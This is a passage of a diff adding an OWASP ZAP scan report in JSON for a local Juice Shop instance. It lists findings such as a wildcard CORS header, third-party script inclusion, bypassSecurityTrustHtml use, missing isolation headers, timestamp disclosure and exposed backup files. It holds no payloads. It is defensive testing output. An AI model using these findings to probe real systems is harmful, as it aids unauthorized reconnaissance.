", + "cweid": "693", + "wascid": "15", + "sourceid": "1" + }, + { + "pluginid": "10098", + "alertRef": "10098", + "alert": "Cross-Domain Misconfiguration", + "name": "Cross-Domain Misconfiguration", + "riskcode": "2", + "confidence": "2", + "riskdesc": "Medium (Medium)", + "desc": "

Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server.

", + "instances":[ + { + "id": "5", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "78", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "75", + "uri": "http://localhost:3000/ftp/incident-support.kdbx", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "17", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "1", + "uri": "http://localhost:3000/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "14", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "9", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "18", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + } + ], + "count": "8", + "systemic": false, + "solution": "

Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance).

Configure the \"Access-Control-Allow-Origin\" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner.

", + "otherinfo": "

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

", + "reference": "

https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy

", + "cweid": "264", + "wascid": "14", + "sourceid": "1" + }, + { + "pluginid": "10017", + "alertRef": "10017", + "alert": "Cross-Domain JavaScript Source File Inclusion", + "name": "Cross-Domain JavaScript Source File Inclusion", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "

The page includes one or more script files from a third-party domain.

", + "instances":[ + { + "id": "6", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "7", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "113", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "118", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "82", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "86", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "90", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "92", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "115", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "117", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "84", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "96", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "112", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "120", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/vendor.js", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "116", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "140", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/styles.css", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "15", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "16", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "18", + "systemic": false, + "solution": "

Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.

", + "otherinfo": "", + "reference": "", + "cweid": "829", + "wascid": "15", + "sourceid": "1" + }, + { + "pluginid": "10110", + "alertRef": "10110", + "alert": "Dangerous JS Functions", + "name": "Dangerous JS Functions", + "riskcode": "1", + "confidence": "1", + "riskdesc": "Low (Low)", + "desc": "

A dangerous JS function seems to be in use that would leave the site vulnerable.

", + "instances":[ + { + "id": "70", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "bypassSecurityTrustHtml(", + "otherinfo": "" + }, + { + "id": "73", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "bypassSecurityTrustHtml(", + "otherinfo": "" + } + ], + "count": "2", + "systemic": false, + "solution": "

See the references for security advice on the use of these functions.

", + "otherinfo": "", + "reference": "

https://v17.angular.io/guide/security

", + "cweid": "749", + "wascid": "-1", + "sourceid": "22" + }, + { + "pluginid": "10063", + "alertRef": "10063-2", + "alert": "Deprecated Feature Policy Header Set", + "name": "Deprecated Feature Policy Header Set", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "

The header has now been renamed to Permissions-Policy.

", + "instances":[ + { + "id": "53", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "119", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "105", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "110", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "114", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "108", + "uri": "http://localhost:3000/ftp/suspicious_errors.yml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "71", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "68", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "65", + "uri": "http://localhost:3000/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "55", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + }, + { + "id": "74", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Feature-Policy", + "otherinfo": "" + } + ], + "count": "11", + "systemic": false, + "solution": "

Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header instead of the Feature-Policy header.

", + "otherinfo": "", + "reference": "

https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy

https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/

", + "cweid": "16", + "wascid": "15", + "sourceid": "7" + }, + { + "pluginid": "90004", + "alertRef": "90004-2", + "alert": "Insufficient Site Isolation Against Spectre Vulnerability", + "name": "Insufficient Site Isolation Against Spectre Vulnerability", + "riskcode": "1", + "confidence": "2", + "riskdesc": "Low (Medium)", + "desc": "

Cross-Origin-Embedder-Policy header is a response header that prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).

", + "instances":[ + { + "id": "58", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "138", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "134", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "143", + "uri": "http://localhost:3000/juice-shop/build/routes/main.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "141", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "142", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "144", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "125", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "132", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "146", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "133", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "56", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "60", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "139", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "148", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "151", + "uri": "http://localhost:3000/juice-shop/build/routes/main.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "153", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "145", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "152", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "126", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "147", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "150", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "149", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "59", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "24", + "systemic": false, + "solution": "

Ensure that the application/web server sets the Cross-Origin-Embedder-Policy header appropriately, and that it sets the Cross-Origin-Embedder-Policy header to 'require-corp' for documents.

If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Embedder-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-embedder-policy).

", + "otherinfo": "", + "reference": "

https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy

", + "cweid": "693", + "wascid": "14", + "sourceid": "7" + }, + { + "pluginid": "10096", + "alertRef": "10096", + "alert": "Timestamp Disclosure - Unix", + "name": "Timestamp Disclosure - Unix", + "riskcode": "1", + "confidence": "1", + "riskdesc": "Low (Low)", + "desc": "

A timestamp was disclosed by the application/web server. - Unix

", + "instances":[ + { + "id": "20", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "22", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "21", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + }, + { + "id": "26", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "30", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "28", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + }, + { + "id": "43", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "34", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1680327869", + "otherinfo": "1680327869, which evaluates to: 2023-04-01 05:44:29." + }, + { + "id": "31", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1701244813", + "otherinfo": "1701244813, which evaluates to: 2023-11-29 08:00:13." + }, + { + "id": "41", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1818181818", + "otherinfo": "1818181818, which evaluates to: 2027-08-13 18:30:18." + }, + { + "id": "33", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1839622642", + "otherinfo": "1839622642, which evaluates to: 2028-04-17 22:17:22." + }, + { + "id": "35", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1863874346", + "otherinfo": "1863874346, which evaluates to: 2029-01-23 14:52:26." + }, + { + "id": "39", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1917098446", + "otherinfo": "1917098446, which evaluates to: 2030-10-01 15:20:46." + }, + { + "id": "45", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "32", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2033195021", + "otherinfo": "2033195021, which evaluates to: 2034-06-06 08:23:41." + }, + { + "id": "44", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + } + ], + "count": "16", + "systemic": false, + "solution": "

Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

", + "otherinfo": "

1650485437, which evaluates to: 2022-04-20 20:10:37.

", + "reference": "

https://cwe.mitre.org/data/definitions/200.html

", + "cweid": "497", + "wascid": "13", + "sourceid": "1" + }, + { + "pluginid": "10116", + "alertRef": "10116", + "alert": "ZAP is Out of Date", + "name": "ZAP is Out of Date", + "riskcode": "1", + "confidence": "3", + "riskdesc": "Low (High)", + "desc": "

The version of ZAP you are using to test your app is out of date and is no longer being updated.

The risk level is set based on how out of date your ZAP version is.

", + "instances":[ + { + "id": "49", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "The latest version of ZAP is 2.17.0" + } + ], + "count": "1", + "systemic": false, + "solution": "

Download the latest version of ZAP from https://www.zaproxy.org/download/ and install it.

", + "otherinfo": "

The latest version of ZAP is 2.17.0

", + "reference": "

https://www.zaproxy.org/download/

", + "cweid": "1104", + "wascid": "45", + "sourceid": "1" + }, + { + "pluginid": "10027", + "alertRef": "10027", + "alert": "Information Disclosure - Suspicious Comments", + "name": "Information Disclosure - Suspicious Comments", + "riskcode": "0", + "confidence": "1", + "riskdesc": "Informational (Low)", + "desc": "

The response appears to contain suspicious comments which may help an attacker.

", + "instances":[ + { + "id": "38", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "query", + "otherinfo": "The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP) and is developed and maintained by voluntee\", see evidence field for the suspicious comment/snippet." + }, + { + "id": "48", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Query", + "otherinfo": "The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//www.w3.org/2000/svg\" viewBox=\"0 0 512 512\">Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.

", + "otherinfo": "

The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP) and is developed and maintained by voluntee\", see evidence field for the suspicious comment/snippet.

", + "reference": "", + "cweid": "615", + "wascid": "13", + "sourceid": "22" + }, + { + "pluginid": "10109", + "alertRef": "10109", + "alert": "Modern Web Application", + "name": "Modern Web Application", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "

The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.

", + "instances":[ + { + "id": "19", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "123", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "136", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "137", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "130", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "129", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "128", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "131", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "127", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "135", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "121", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "122", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "124", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "24", + "uri": 